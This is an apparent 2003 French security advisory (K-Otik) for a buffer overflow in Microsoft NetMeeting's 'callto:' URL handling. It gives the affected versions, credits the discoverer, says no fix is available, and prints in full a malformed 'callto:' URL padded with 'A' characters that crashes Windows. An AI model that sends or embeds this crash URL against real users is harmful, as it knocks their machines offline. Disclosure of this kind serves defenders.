Microsoft Netmeeting CALLTO URL Buffer Overflow

 Date de Publication: 2003-05-26
 Titre:
Microsoft Netmeeting CALLTO URL Buffer Overflow
 K-Otik ID : 0111
 Exploitable à distance : Non
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Une vulnérabilité de type Buffer Overflow existe dans Microsoft Netmeeting. En cliquant sur une url malformée
'callto:', ceci crashera windows. Ce problème résulte d'une erreur dans la manipulation des requêtes 'callto'

callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAA
AAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAaAAAAAAAAAA+type=directory


  * Versions Vulnérables *

Microsoft NetMeeting version 3.0.1 4.4.3385
 

  * Solution *

Aucune Solution pour le moment.


  * Crédits *
 
Faille découverte par
David F. Madrid (Mai 2003).